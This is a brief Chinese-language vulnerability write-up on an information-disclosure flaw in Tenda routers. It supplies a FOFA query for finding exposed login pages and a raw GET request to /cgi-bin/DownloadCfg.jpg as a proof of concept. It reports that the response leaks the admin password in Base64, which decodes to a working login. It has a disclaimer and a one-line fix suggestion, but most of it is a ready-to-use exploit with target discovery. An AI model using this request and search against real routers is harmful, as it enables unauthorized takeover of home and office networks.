前言
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
一、产品简介
Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器。Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。
二、漏洞描述
该产品DownloadCfg.jpg文件存在信息泄露漏洞,攻击者可获得路由器后台账号密码。
三、影响范围
Tenda-路由器设备
四、复现环境
FOFA:title=“Tenda | LOGIN”
五、漏洞复现
1.访问存在漏洞的网站,抓包
2.POC
GET /cgi-bin/DownloadCfg.jpg HTTP/1.1
Host: ip-port
Content-Length: 2
3.成功获得账号密码
密码进行了BASE加密,解码后尝试登录,成功
六、修复建议
关闭互联网访问的权限,及时升级系统
参考链接
https://blog.csdn.net/qq_53003652/article/details/134730593